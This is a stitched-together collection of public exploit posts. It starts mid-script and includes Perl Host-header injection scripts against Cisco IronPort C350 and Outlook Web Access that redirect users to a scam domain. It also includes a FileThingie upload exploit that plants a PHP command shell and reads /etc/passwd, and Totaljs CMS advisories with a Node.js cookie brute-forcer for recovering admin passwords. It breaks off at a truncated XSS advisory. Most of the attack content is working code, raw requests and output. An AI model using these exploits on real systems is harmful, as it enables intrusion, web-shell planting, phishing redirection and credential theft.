say "# <  $_ => ", $response->header($_) for  $response->header_field_names;
print "# ====================================================================================\n";
if (defined ($response->header('Location')) and ($response->header('Location') =~ m/$attacker/i)){
  printf ("# IronPort is Poisoned => %s\n", $response->header('Location'));
  exit;

} else {

  printf ("# Exploit failed!\n");
  exit;

}

#!/usr/bin/perl -w
#
#
#  Cisco IronPort C350 Remote Header 'Host' Injection
#
#
#  Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
#
#
#  Disclaimer:
#  This or previous programs are for Educational purpose ONLY. Do not use it without permission. 
#  The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages 
#  caused by direct or indirect use of the  information or functionality provided by these programs. 
#  The author or any Internet provider  bears NO responsibility for content or misuse of these programs 
#  or any derivatives thereof. By using these programs you accept the fact  that any damage (dataloss, 
#  system crash, system compromise, etc.) caused by the use  of these programs are not Todor Donev's 
#  responsibility.
#   
#  Use them at your own risk!
#
#
#       [test@localhost ironport]$ perl ironport_c350.pl https://192.168.1.1
#  # Cisco IronPort C350 Remote Header 'Host' Injection
#  # ==================================================
#  # Author: Todor Donev 2019 (c) <todor.donev at gmail.com>
#  # >  Host => scam-page.com
#  # >  User-Agent => Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b) Gecko/20050217
#  # >  Content-Type => application/x-www-form-urlencoded
#  # <  Cache-Control => no-store,no-cache,must-revalidate,max-age=0,post-check=0,pre-check=0
#  # <  Date => Tue, 03 Sep 2019 14:18:51 GMT
#  # <  Location => https://scam-page.com/login?CSRFKey=76b140ff-7e88-4eaf-ae60-7f6205532297&referrer=https%3A%2F%2Fscam-page.com%2FSearch
#  # <  Server => glass/1.0 Python/2.6.4
#  # <  Content-Type => text/html
#  # <  Expires => Tue, 03 Sep 2019 14:18:51 GMT
#  # <  Last-Modified => Tue, 03 Sep 2019 14:18:51 GMT
#  # <  Client-Date => Tue, 03 Sep 2019 14:18:52 GMT
#  # <  Client-Peer => 192.168.1.1:443
#  # <  Client-Response-Num => 1
#  # <  Client-SSL-Cert-Issuer => 
#  # <  Client-SSL-Cert-Subject => 
#  # <  Client-SSL-Cipher => DHE-RSA-AES256-SHA
#  # <  Client-SSL-Socket-Class => IO::Socket::SSL
#  # <  Client-SSL-Warning => Peer certificate not verified
#  # <  Refresh => 0; URL=https://scam-page.com/login?CSRFKey=76b140ff-7e88-4eaf-ae60-7f6205532297&referrer=https%3A%2F%2Fscam-page.com%2FSearch
#  # <  Set-Cookie => sid=9DGT8pSoFYuBq74dVpfh; expires=Thursday, 05-Sep-2019 14:18:51 GMT; httponly; Path=/; secure
#  # <  Title => : Redirecting
#  # ==================================================
#  # IronPort is Poisoned => https://scam-page.com/login?CSRFKey=76b140ff-7e88-4eaf-ae60-7f6205532297&referrer=https%3A%2F%2Fscam-page.com%2FSearch
#       [test@localhost ironport]$ 
#
#
#  Request Smuggling Attack - Input and Data Validation
#    
#  Implementation
#    
#    o   Attack Applies To Vulnerable web servers and proxies.
#  
#  
#  Description
#  
#  HTTP request smuggling is a technique to take advantage 
#  of discrepancies in parsing when one or more HTTP devices
#  are between the user and the web server. An attacker may 
#  be able to 'smuggle' malicious requests through a packet 
#  inspector, firewall or web proxy server. This technique 
#  may leave the web server vulnerable to various attacks 
#  such as web cache poisoning, or allow the attacker to 
#  request protected files on the web server.
#  
#  Impact
#  
#        Cache poisoning: An attacker may be able to ‘rewire’ 
#    o   a web server cache so that one page is served when 
#        another is requested.
#
#        Malicious requests: An attacker may be able to smuggle 
#    o   a malicious request through a packet inspector, web proxy
#        server, or firewall because of discrepancies in security 
#        rules between it and the web server.
#
#        Credential hijacking: An attacker may be able to insert 
#    o   a request into the HTTP flow, thereby manipulating the 
#        web server’s request/response sequencing, which can allow 
#        the attacker to hijack a third party’s credentials.
#  
#  Vulnerabilities
#  
#     o  Web server, packet inspector, firewall, or web proxy server 
#        misconfiguration.
#  
#  Countermeasures
#  
#        Deploy a non-vulnerable web server: Web servers with a very 
#     o  strict HTTP parsing procedure may not be vulnerable to this 
#        attack.
#
#        Change all pages to non-cacheable: This will force the proxy 
#        to retrieve the pages from the web server every time. Although 
#     o  this is better from a security perspective, the reality is that 
#        caching significantly improves the server's performance and 
#        reduces latency. Thus, other countermeasures are a better long 
#        term fix.
#
#     o  Rewrite all HTTP requests: Install a module on a firewall or 
#        proxy server to rewrite each HTTP request on the fly to a known 
#        valid request type.
#
#     o  Update your web server: Contact the web server vendor and check 
#        if there has been a patch released for a this type of vulnerability.
#  
#  
#  Example
#  
#  This example describes the classic request smuggling attack
#  in which an attacker can poison one page with the contents 
#  of another. In this example, the attacker combines one POST 
#  request and two GET requests into a single malformed HTTP 
#  request. The HTTP request has two Content-Length headers 
#  with conflicting values. Some servers, such as IIS and 
#  Apache simply reject such a request, but others attempt to 
#  ‘fix’ the error. Fortunately for the attacker, certain web 
#  servers and web proxies choose to pay attention to different
#  sections of the malformed request.
#  
#  In this case let "somewhere.com" be the DNS name of the web 
#  server behind the proxy, and suppose that "/poison.html" is
#  a static and cacheable HTML page on the web server.
#  
#  1 POST http://somewhere.com/example.html 
#  HTTP/1.1\r\n2 Host: somewhere.com\r\n3 
#  Connection: Keep-Alive\r\n4 
#  Content-Type: application/x-www-form-urlencoded\r\n5 
#  Content-Length: 0\r\n6 Content-Length: 53\r\n7 \r\n8 GET /poison.html HTTP/1.1\r\n9 
#  Host: somewhere.com\r\n10 Bla: 11 GET http://somewhere.com/index.html HTTP/1.1\r\n12 
#  Host: somewhere.com\r\n13 Connection: Keep-Alive\r\n14 \r\n
#  
#  Note that line 10 is the only line that does not end in 
#  CRLF ("\r\n") and instead there is a space ("Bla: "). 
#  This request is sent to a web server via a proxy server.
#  
#  First, this message is parsed by the proxy. When the proxy server 
#  parses the message, it finds the POST request (lines 1-7) followed by 
#  the two conflicting Content-Length's (lines 5 and 6). The proxy ignores
#  the first header and believes the body is 53 bytes long (which is exactly 
#  the number of bytes used by lines 8-10 including CRLFs). The proxy then 
#  sees lines 11-14 and interprets them as a second request.
#  
#  Second, the message is parsed by the web server. Although the web server
#  receives the same message, when it sees the first Content-Length in line 5,
#  it thinks that the body of the POST request is 0 bytes in length. 
#  Therefore it finds the second request in line 8 and interprets line 11 
#  as the value of "Bla: " in line 10 because of the missing CRLF.
#  
#  
#  At this point the web server responds to the GET in line 8 by sending 
#  the content of /poison.html to the proxy. The proxy, expecting a 
#  response to the GET request in line 11, mistakenly matches the reply 
#  from the webserver with contents from /poison.html to the page /index.html. 
#  Therefore, the contents of /poison.html are cached under the name /index.html 
#  on the proxy. Now any user who requests http://somewhere.com/index.html 
#  through the proxy will receive the contents of http://somewhere.com/poison.html 
#  instead.
#  
#  There are several options available to mitigate this attack but all of 
#  them have their downside. If possible, use a well tested web server such 
#  as Apache or IIS. Otherwise, you can turn off server-side page caching, 
#  but this can lead to significant performance problems such as increased 
#  server load and latency. A final option is to use SSL communication for 
#  everything (HTTPS instead of HTTP), but this too has an associated 
#  performance overhead. 
# 
use strict;
use v5.10;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;


my $host = shift || '';
my $attacker = shift || 'scam-page.com';


print "# Cisco IronPort C350 Remote Header 'Host' Injection
# ==================================================
# Author: Todor Donev 2019 (c) <todor.donev at gmail.com>
";
if ($host !~ m/^http/){
print  "# e.g. perl $0 https://target:port/ scam-page.com
";
exit;
}

my $user_agent = rand_ua("browsers");
my $browser  = LWP::UserAgent->new(
                                        protocols_allowed => ['http', 'https'],
                                        ssl_opts => { verify_hostname => 0 }
                                );
   $browser->timeout(10);
   $browser->agent($user_agent);

my $request = HTTP::Request->new (POST => $host,[Content_Type => "application/x-www-form-urlencoded"], "");
$request->header("Host" => $attacker);
my $response = $browser->request($request);
print "# 401 Unauthorized!\n" and exit if ($response->code eq '401');
say "# >  $_ => ", $request->header($_) for  $request->header_field_names;
say "# <  $_ => ", $response->header($_) for  $response->header_field_names;
print "# ==================================================\n";
if (defined ($response->header('Location')) and ($response->header('Location') =~ m/$attacker/i)){
  printf ("# IronPort is Poisoned => %s\n", $response->header('Location'));
  exit;

} else {

  printf ("# Exploit failed!\n");
  exit;

}

#!/usr/bin/perl -w
#
#
#  Microsoft Outlook Web Access build:14.3.224.2 Remote Header 'Host' Injection
#
#
#  Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
#
#
#
#  I suspect "Web Cache Poison" but I'm not sure, so test ;))
#
#
#
#  Disclaimer:
#  This or previous programs are for Educational purpose ONLY. Do not use it without permission. 
#  The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages 
#  caused by direct or indirect use of the  information or functionality provided by these programs. 
#  The author or any Internet provider  bears NO responsibility for content or misuse of these programs 
#  or any derivatives thereof. By using these programs you accept the fact  that any damage (dataloss, 
#  system crash, system compromise, etc.) caused by the use  of these programs are not Todor Donev's 
#  responsibility.
#   
#  Use them at your own risk!
#
#
#       [test@localhost owa]$ perl microsoft_owa_14_3_224_2.pl https://192.168.1.1
#  # Microsoft Outlook Web Access build:14.3.224.2 Remote Header 'Host' Injection
#  # ============================================================================
#  # Author: Todor Donev 2019 (c) <todor.donev at gmail.com>
#  # >  Host => scam-page.com
#  # >  User-Agent => Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.7.5) Gecko/20050105 Epiphany/1.4.8
#  # >  Content-Type => application/x-www-form-urlencoded
#  # <  Date => Tue, 03 Sep 2019 14:36:51 GMT
#  # <  Location => https://scam-page.com/owa/
#  # <  Server => Microsoft-IIS/8.5
#  # <  Content-Length => 149
#  # <  Content-Type => text/html; charset=UTF-8
#  # <  Client-Date => Tue, 03 Sep 2019 14:36:57 GMT
#  # <  Client-Peer => 192.168.1.1:443
#  # <  Client-Response-Num => 1
#  # <  Client-SSL-Cert-Issuer => 
#  # <  Client-SSL-Cert-Subject =>
#  # <  Client-SSL-Cipher => ECDHE-RSA-AES256-SHA
#  # <  Client-SSL-Socket-Class => IO::Socket::SSL
#  # <  Client-SSL-Warning => Peer certificate not verified
#  # <  Title => Document Moved
#  # <  X-Powered-By => ASP.NETARR/2.5
#  # ============================================================================
#  # OWA is Poisoned => https://scam-page.com/owa/
#       [test@localhost owa]$ 
#
#
#  Request Smuggling Attack - Input and Data Validation
#    
#  Implementation
#    
#    o   Attack Applies To Vulnerable web servers and proxies.
#  
#  
#  Description
#  
#  HTTP request smuggling is a technique to take advantage 
#  of discrepancies in parsing when one or more HTTP devices
#  are between the user and the web server. An attacker may 
#  be able to 'smuggle' malicious requests through a packet 
#  inspector, firewall or web proxy server. This technique 
#  may leave the web server vulnerable to various attacks 
#  such as web cache poisoning, or allow the attacker to 
#  request protected files on the web server.
#  
#  Impact
#  
#        Cache poisoning: An attacker may be able to ‘rewire’ 
#    o   a web server cache so that one page is served when 
#        another is requested.
#
#        Malicious requests: An attacker may be able to smuggle 
#    o   a malicious request through a packet inspector, web proxy
#        server, or firewall because of discrepancies in security 
#        rules between it and the web server.
#
#        Credential hijacking: An attacker may be able to insert 
#    o   a request into the HTTP flow, thereby manipulating the 
#        web server’s request/response sequencing, which can allow 
#        the attacker to hijack a third party’s credentials.
#  
#  Vulnerabilities
#  
#     o  Web server, packet inspector, firewall, or web proxy server 
#        misconfiguration.
#  
#  Countermeasures
#  
#        Deploy a non-vulnerable web server: Web servers with a very 
#     o  strict HTTP parsing procedure may not be vulnerable to this 
#        attack.
#
#        Change all pages to non-cacheable: This will force the proxy 
#        to retrieve the pages from the web server every time. Although 
#     o  this is better from a security perspective, the reality is that 
#        caching significantly improves the server's performance and 
#        reduces latency. Thus, other countermeasures are a better long 
#        term fix.
#
#     o  Rewrite all HTTP requests: Install a module on a firewall or 
#        proxy server to rewrite each HTTP request on the fly to a known 
#        valid request type.
#
#     o  Update your web server: Contact the web server vendor and check 
#        if there has been a patch released for a this type of vulnerability.
#  
#  
#  Example
#  
#  This example describes the classic request smuggling attack
#  in which an attacker can poison one page with the contents 
#  of another. In this example, the attacker combines one POST 
#  request and two GET requests into a single malformed HTTP 
#  request. The HTTP request has two Content-Length headers 
#  with conflicting values. Some servers, such as IIS and 
#  Apache simply reject such a request, but others attempt to 
#  ‘fix’ the error. Fortunately for the attacker, certain web 
#  servers and web proxies choose to pay attention to different
#  sections of the malformed request.
#  
#  In this case let "somewhere.com" be the DNS name of the web 
#  server behind the proxy, and suppose that "/poison.html" is
#  a static and cacheable HTML page on the web server.
#  
#  1 POST http://somewhere.com/example.html 
#  HTTP/1.1\r\n2 Host: somewhere.com\r\n3 
#  Connection: Keep-Alive\r\n4 
#  Content-Type: application/x-www-form-urlencoded\r\n5 
#  Content-Length: 0\r\n6 Content-Length: 53\r\n7 \r\n8 GET /poison.html HTTP/1.1\r\n9 
#  Host: somewhere.com\r\n10 Bla: 11 GET http://somewhere.com/index.html HTTP/1.1\r\n12 
#  Host: somewhere.com\r\n13 Connection: Keep-Alive\r\n14 \r\n
#  
#  Note that line 10 is the only line that does not end in 
#  CRLF ("\r\n") and instead there is a space ("Bla: "). 
#  This request is sent to a web server via a proxy server.
#  
#  First, this message is parsed by the proxy. When the proxy server 
#  parses the message, it finds the POST request (lines 1-7) followed by 
#  the two conflicting Content-Length's (lines 5 and 6). The proxy ignores
#  the first header and believes the body is 53 bytes long (which is exactly 
#  the number of bytes used by lines 8-10 including CRLFs). The proxy then 
#  sees lines 11-14 and interprets them as a second request.
#  
#  Second, the message is parsed by the web server. Although the web server
#  receives the same message, when it sees the first Content-Length in line 5,
#  it thinks that the body of the POST request is 0 bytes in length. 
#  Therefore it finds the second request in line 8 and interprets line 11 
#  as the value of "Bla: " in line 10 because of the missing CRLF.
#  
#  
#  At this point the web server responds to the GET in line 8 by sending 
#  the content of /poison.html to the proxy. The proxy, expecting a 
#  response to the GET request in line 11, mistakenly matches the reply 
#  from the webserver with contents from /poison.html to the page /index.html. 
#  Therefore, the contents of /poison.html are cached under the name /index.html 
#  on the proxy. Now any user who requests http://somewhere.com/index.html 
#  through the proxy will receive the contents of http://somewhere.com/poison.html 
#  instead.
#  
#  There are several options available to mitigate this attack but all of 
#  them have their downside. If possible, use a well tested web server such 
#  as Apache or IIS. Otherwise, you can turn off server-side page caching, 
#  but this can lead to significant performance problems such as increased 
#  server load and latency. A final option is to use SSL communication for 
#  everything (HTTPS instead of HTTP), but this too has an associated 
#  performance overhead. 
# 
use strict;
use v5.10;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;


my $host = shift || '';
my $attacker = shift || 'scam-page.com';


print "# Microsoft Outlook Web Access build:14.3.224.2 Remote Header 'Host' Injection
# ============================================================================
# Author: Todor Donev 2019 (c) <todor.donev at gmail.com>
";
if ($host !~ m/^http/){
print  "# e.g. perl $0 https://target:port/ scam-page.com
";
exit;
}

my $user_agent = rand_ua("browsers");
my $browser  = LWP::UserAgent->new(
                                        protocols_allowed => ['http', 'https'],
                                        ssl_opts => { verify_hostname => 0 }
                                );
   $browser->timeout(10);
   $browser->agent($user_agent);

my $request = HTTP::Request->new (POST => $host,[Content_Type => "application/x-www-form-urlencoded"], "");
$request->header("Host" => $attacker);
my $response = $browser->request($request);
print "# 401 Unauthorized!\n" and exit if ($response->code eq '401');
say "# >  $_ => ", $request->header($_) for  $request->header_field_names;
say "# <  $_ => ", $response->header($_) for  $response->header_field_names;
print "# ============================================================================\n";
if (defined ($response->header('Location')) and ($response->header('Location') =~ m/$attacker/i)){
  printf ("# OWA is Poisoned => %s\n", $response->header('Location'));
  exit;

} else {

  printf ("# Exploit failed!\n");
  exit;

}

# Exploit Title: FileThingie 2.5.7 - Arbitrary File Upload
# Author: Cakes
# Discovery Date: 2019-09-03
# Vendor Homepage: www.solitude.dk/filethingie
# Software Link: https://github.com/leefish/filethingie/archive/master.zip
# Tested Version: 2.5.7
# Tested on OS: CentOS 7
# CVE: N/A

# Intro:
# Easy arbitrary file upload vulnerability allows an attacker to upload malicious .zip archives

::::: POST .zip file with cmd shell

POST /filethingy/ft2.php HTTP/1.1
Host: 10.0.0.21
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.0.0.21/filethingy/ft2.php?dir=/tester
Content-Type: multipart/form-data; boundary=---------------------------3402520321248020588131184034
Content-Length: 1117
Cookie: issabelSession=67ne0anmf52drmijjf1s1ju380; PHPSESSIDnERPteam=tl1e1m4eieonpgflqa1colhqs2; nERP_installation=60kne7l4f54fico5ud4tona073; 100021corebos=ktk7mnr6pspnet6n2ij582e1v7; ci_cookie=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22175c2b30943f07368eef92a9dcdd2ecb%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%2210.0.0.17%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A68%3A%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A60.0%29+Gecko%2F20100101+Firefox%2F60.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1567451164%3B%7D9ff869bbb4f3d937de5d566b82eaf01a; PHPSESSID=jl9jcj3vfqf53ujcj332gncpe7
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1

-----------------------------3402520321248020588131184034
Content-Disposition: form-data; name="localfile-1567531192592"; filename=""
Content-Type: application/octet-stream


-----------------------------3402520321248020588131184034
Content-Disposition: form-data; name="MAX_FILE_SIZE"

2000000
-----------------------------3402520321248020588131184034
Content-Disposition: form-data; name="localfile"; filename="cmdshell.zip"
Content-Type: application/zip

PK   š#O        $      cmdshell.phpUT
۟n]۟n]۟n]ux        ³±/È(P(ÃŽHÃɉOÂHMÖP‰ww
‰VOÃŽMQÂÕ´VP°·ã PKý(tÃ…&   $   PK   š#Oý(tÃ…&   $              ¤    cmdshell.phpUT
۟n]۟n]۟n]ux        PK      Z   €     
-----------------------------3402520321248020588131184034
Content-Disposition: form-data; name="act"

upload
-----------------------------3402520321248020588131184034
Content-Disposition: form-data; name="dir"

/tester
-----------------------------3402520321248020588131184034
Content-Disposition: form-data; name="submit"

Upload
-----------------------------3402520321248020588131184034--





:::::::::::::::::::::::::::::Unzip  Malicious file

POST /filethingy/ft2.php HTTP/1.1
Host: 10.0.0.21
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.0.0.21/filethingy/ft2.php?dir=/tester
Content-Type: application/x-www-form-urlencoded
Content-Length: 63
Cookie: issabelSession=67ne0anmf52drmijjf1s1ju380; PHPSESSIDnERPteam=tl1e1m4eieonpgflqa1colhqs2; nERP_installation=60kne7l4f54fico5ud4tona073; 100021corebos=ktk7mnr6pspnet6n2ij582e1v7; ci_cookie=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22175c2b30943f07368eef92a9dcdd2ecb%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%2210.0.0.17%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A68%3A%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A60.0%29+Gecko%2F20100101+Firefox%2F60.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1567451164%3B%7D9ff869bbb4f3d937de5d566b82eaf01a; PHPSESSID=jl9jcj3vfqf53ujcj332gncpe7
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1

newvalue=cmdshell.zip&file=cmdshell.zip&dir=%2Ftester&act=unzip



::::::::::::::::::::::::::::::Access your shell

GET /filethingy/folders/tester/cmdshell.php?cmd=whoami HTTP/1.1
Host: 10.0.0.21
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: issabelSession=67ne0anmf52drmijjf1s1ju380; PHPSESSIDnERPteam=tl1e1m4eieonpgflqa1colhqs2; nERP_installation=60kne7l4f54fico5ud4tona073; 100021corebos=ktk7mnr6pspnet6n2ij582e1v7; ci_cookie=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22175c2b30943f07368eef92a9dcdd2ecb%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%2210.0.0.17%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A68%3A%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A60.0%29+Gecko%2F20100101+Firefox%2F60.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1567451164%3B%7D9ff869bbb4f3d937de5d566b82eaf01a; PHPSESSID=jl9jcj3vfqf53ujcj332gncpe7
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1
Cache-Control: max-age=0


::::::::::::::::::::::::::::::Read /etc/passwd

GET /filethingy/folders/tester/cmdshell.php?cmd=cat%20/etc/passwd HTTP/1.1
Host: 10.0.0.21
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: issabelSession=67ne0anmf52drmijjf1s1ju380; PHPSESSIDnERPteam=tl1e1m4eieonpgflqa1colhqs2; nERP_installation=60kne7l4f54fico5ud4tona073; 100021corebos=ktk7mnr6pspnet6n2ij582e1v7; ci_cookie=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22175c2b30943f07368eef92a9dcdd2ecb%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%2210.0.0.17%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A68%3A%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A60.0%29+Gecko%2F20100101+Firefox%2F60.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1567451164%3B%7D9ff869bbb4f3d937de5d566b82eaf01a; PHPSESSID=jl9jcj3vfqf53ujcj332gncpe7
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1

HTTP/1.1 200 OK
Date: Tue, 03 Sep 2019 17:38:04 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
X-Powered-By: PHP/5.4.16
Content-Length: 1738
Connection: close
Content-Type: text/html; charset=UTF-8

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
misdn:x:31:31:Modular ISDN:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
polkitd:x:999:998:User for polkitd:/:/sbin/nologin
cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/sbin/nologin
mailman:x:41:41:GNU Mailing List Manager:/usr/lib/mailman:/sbin/nologin
saslauth:x:998:76:Saslauthd user:/run/saslauthd:/sbin/nologin
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
uucp:x:10:14:Uucp user:/var/spool/uucp:/sbin/nologin
tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
dhcpd:x:177:177:DHCP server:/:/sbin/nologin
asterisk:x:997:994:Asterisk PBX:/var/lib/asterisk:/bin/bash
spamfilter:x:1000:1000::/home/spamfilter:/bin/bash
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
avahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologin
chrony:x:996:993::/var/lib/chrony:/sbin/nologin
cakes:x:1001:1001:cakes:/home/cakes:/bin/bash

*Totaljs CMS authenticated path traversal (could lead to RCE)*

[+] Author/Discoverer: Riccardo Krauter @CertimeterGroup
**

[+] Title: Totaljs CMS authenticated path traversal (could lead to RCE)

[+] Affected software: Totaljs CMS 12.0

[+] Description: An authenticated user with “Pages” privilege can 
include via path traversal attack (../) .html files that are outside the 
permitted directory. Also if the page contains template directive, then 
the directive will be server side processed, so if a user can control 
the content of a .html file, then can inject payload with malicious 
template directive to gain RemoteCodeExecution.
The exploit will work only with .html extension.

[+] Step to reproduce:

1) go to http://localhost:8000/admin/pages/
2) click on create button
3) enable burp proxy forwarding
4) select a template from the menu this will send a POST request to the API
5) from burp modify the json body request by adding the path traversal 
on the template parameter like this 
{"body":"","template":"../../../../../../../../../../../../var/www/html/test_rce"}
do NOT add the .html extension it will be added to the back-end API
6) send the request

[+] Project link: https://github.com/totaljs/cms

[+] Original report and details: 
https://github.com/beerpwn/CVE/blob/master/Totaljs_disclosure_report/report_final.pdf

[+] Timeline:

- 13/02/2019 -> reported the issue to the vendor

.... many ping here

- 18/06/2019 -> pinged the vendor last time

- 29/08/2019 -> reported to seclist

[+] Author/Discoverer: Riccardo Krauter @CertimeterGroup

[+] Title: Totaljs CMS Insecure Admin Session cookie

[+] Affected software: Totaljs CMS 12.0

[+] Description:

A low privilege user can easily crack the owned cookie to obtain the 
“random” values inside it. If this user can leak a session cookie owned 
by another admin, then it’s possible to brute force it with O(n)=2n 
instead of O(n)=n^x complexity and steal the admin password. In such way 
he break the admin password.

[+] Step to reproduce:

In the file schemas/settings.js
we have that the value for the session cookie is equivalent as:

var key = (user.login + ':' + user.password + ':' + F.config.secret + 
string_hash(user.login + ':' + user.password).hash()).md5();

where
Os = require(“os”);
F.config.secret = (Os.hostname()'-' + Os.platform() + '-' + Os.arch() + 
'-' + Os.release() + '-' + Os.tmpdir());

and string_hash() is a custom function.

All of this Os variables are easily guessable or brute-forceable.
An attacker can enumerate the machine server with nmap scan to evaluate 
the architecture behind (linux, windows...) in this way he escape the 
randomness for Os.platform() parameter.
The Os.arch() parameter can be ‘x32’ or ‘x64’, then not so much random 
in it.
The Os.release() can be easily listed because are common and public 
(e.g. 4.15.0-45-generic), also it will be influenced from the recon of 
the Os.platform() in such way if the attacker enumerated a linux machine 
he can use a list of all linux version.
The Os.tmpdir() param is totally guessable. For example in linux systems 
is /tmp by default.
The Os.hostname() is probably the more random parameter here but a 
dictionary based attack can be efficacious to retrieve it.

[+] POC Script:

// cookie_brute.js

var Os = require('os');

var crypto = require('crypto');

var lineByLine = require('n-readlines');

function string_hash(s, convert) {

var hash = 0;

if (s.length === 0)

return convert ? '' : hash;

for (var i = 0, l = s.length; i < l; i++) {

var char = s.charCodeAt(i);

hash = ((hash << 5) - hash) + char;

hash |= 0;

}

//console.log(hash);

return hash;

}


`

schemas/settings.js: var key = (user.login + ':' + user.password + ':' + 
F.config.secret + (user.login + ':' + user.password).hash()).md5();

`

//brute forcing the hostname

var liner2 = new lineByLine('/usr/share/wordlists/darkc0de.txt');

var hostname;

owned_passwd = "paw";

var name = "paw";

user_cookie = "b5268788942f8c6057ce83aa98cef85e";

while (hostname = liner2.next()) {

var secret = (hostname + '-' + Os.platform() + '-' + Os.arch() + '-' + 
Os.release() + '-' + Os.tmpdir());

secret = crypto.createHash('md5').update(secret).digest("hex");

var h = (name + ':' + owned_passwd + ':' + secret + string_hash(name + 
':' + owned_passwd));

h = crypto.createHash('md5').update(h).digest("hex");

if(user_cookie === h){

console.log('[+] Match found with user:password:hostname: ', name + ":"
+ owned_passwd + ":" + hostname);

break;

}

}

//bruteforcing the password

admin_cookie = "d3316f9bd135906890fbc36d858304a5";

var liner = new lineByLine('/usr/share/wordlists/darkc0de.txt');

var name = "admin";

var secret = (hostname + '-' + Os.platform() + '-' + Os.arch() + '-' + 
Os.release() + '-' + Os.tmpdir());

secret = crypto.createHash('md5').update(secret).digest("hex");

while (password = liner.next()) {

var h = (name + ':' + password + ':' + secret + string_hash(name + ':' + 
password));

h = crypto.createHash('md5').update(h).digest("hex");

if( admin_cookie === h){

console.log('[+] Match found with user:password:hostname: ', name + ":"
+ password + ":" + hostname);

return;

}

}

[+] Project link: https://github.com/totaljs/cms

[+] Original report and details: 
https://github.com/beerpwn/CVE/blob/master/Totaljs_disclosure_report/report_final.pdf

[+] Timeline:

- 13/02/2019 -> reported the issue to the vendor

.... many ping here

- 18/06/2019 -> pinged the vendor last time

- 30/08/2019 -> reported to seclist

Class Input Validation Error
Remote  Yes

Credit Ricardo Sanchez
Vulnerable Portrait-Archiv.com Photostore 5.0.4

Portrait-Archiv.com is prone to a reflected cross-site scripting
vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the
browser of an unsuspecting user in the context of the affected site. This
may allow the attacker to steal cookie-based authentication credentials and
to launch other attacks.

To exploit this issue following steps:
